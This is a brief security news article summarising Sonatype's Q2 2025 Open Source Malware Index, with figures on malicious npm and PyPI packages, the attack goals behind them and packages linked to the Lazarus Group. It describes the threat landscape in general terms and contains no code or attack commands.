Open source has a malware problem, and it’s getting worse
Sonatype has published its Q2 2025 Open Source Malware Index, identifying 16,279 malicious open source packages across major ecosystems such as npm and PyPI. This brings the total number of malware packages discovered by the company to 845,204. Compared to the same quarter last year, the volume of detected malware has jumped by 188%, highlighting the escalating scale and sophistication of attacks targeting developers, software teams, and CI/CD pipelines.
“Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in,” said Brian Fox, CTO of Sonatype. “Developers and security teams must be vigilant, as threats increasingly hide in plain sight within everyday tools and dependencies.”
More than half of attacks aim to steal secrets and sensitive data
Data theft continues to be the most common goal behind malicious open source packages. In the second quarter of 2025, 55 percent of the threats found were built to steal sensitive information, including secrets, passwords, access tokens, API keys, and personal data. Over 4,400 packages were created specifically for this purpose. Many of these attacks focus on the tools and systems developers use, where stealing one piece of data can put entire systems at risk.
Data corruption attacks are becoming more common
Researchers also found a sharp increase in malware designed to damage or interfere with data. These types of threats doubled from the previous quarter and now make up just over 3 percent of all malicious packages, with more than 400 identified in Q2. These packages are built to corrupt files, inject harmful code, or disrupt software and infrastructure in other ways.
Cryptomining malware is slightly less common
Malware that hijacks systems to mine cryptocurrency made up about 5 percent of the malicious packages found in Q2. That is a small drop from earlier in the year. The change may suggest that attackers are putting more effort into stealing credentials or gaining deeper access to systems instead of just using up resources.
Well-known threat groups are using open source at scale
Researchers linked 107 malicious packages to the Lazarus Group, a hacking group connected to the North Korean government. Those packages had more than 30,000 known downloads. The findings show that advanced threat groups are using open source ecosystems to carry out spying, financial crime, and other long-term operations.
Must read:
- 35 open-source security tools to power your red team, SOC, and cloud security
- GitHub CISO on security strategy and collaborating with the open-source community